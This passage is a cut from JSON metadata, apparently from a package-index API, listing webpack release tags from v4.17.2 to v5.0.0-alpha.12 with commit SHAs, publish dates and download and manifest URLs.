webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"h